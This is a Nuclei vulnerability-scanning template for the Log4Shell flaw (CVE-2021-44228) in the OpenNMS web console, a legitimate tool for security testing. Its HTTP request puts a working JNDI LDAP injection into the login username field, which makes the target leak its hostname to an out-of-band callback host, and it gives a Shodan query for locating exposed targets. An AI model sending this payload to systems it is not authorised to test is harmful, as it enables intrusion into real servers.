67 lines
2.5 KiB
YAML
67 lines
2.5 KiB
YAML
id: opennms-log4j-jndi-rce
|
|
|
|
info:
|
|
name: OpenNMS - JNDI Remote Code Execution (Apache Log4j)
|
|
author: johnk3r
|
|
severity: critical
|
|
description: |
|
|
OpenNMS JNDI is susceptible to remote code execution via Apache Log4j 2.14.1 and before. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
|
|
reference:
|
|
- https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/
|
|
- https://www.opennms.com/en/blog/2021-12-10-opennms-products-affected-by-apache-log4j-vulnerability-cve-2021-44228/
|
|
- https://logging.apache.org/log4j/2.x/security.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2021-44228
|
|
cwe-id: CWE-77
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"OpenNMS Web Console"
|
|
tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast
|
|
variables:
|
|
rand1: '{{rand_int(111, 999)}}'
|
|
rand2: '{{rand_int(111, 999)}}'
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /opennms/j_spring_security_check HTTP/1.1
|
|
Referer: {{RootURL}}/opennms/login.jsp
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: regex
|
|
part: interactsh_request
|
|
regex:
|
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
|
|
|
extractors:
|
|
- type: kval
|
|
kval:
|
|
- interactsh_ip # Print remote interaction IP in output
|
|
|
|
- type: regex
|
|
group: 2
|
|
regex:
|
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
|
part: interactsh_request
|
|
|
|
- type: regex
|
|
group: 1
|
|
regex:
|
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
|
part: interactsh_request
|
|
|
|
# digest: 490a0046304402204274bbb4d70b5aca0b3d4c50a6de403c3fed4178a135e67736d456f4a6d086bb0220452fe2469e83bd2bf38f2ee43f76528b4be615fe0a0ea16ac334deec2c683d00:922c64590222798bb761d5b6d8e72950
|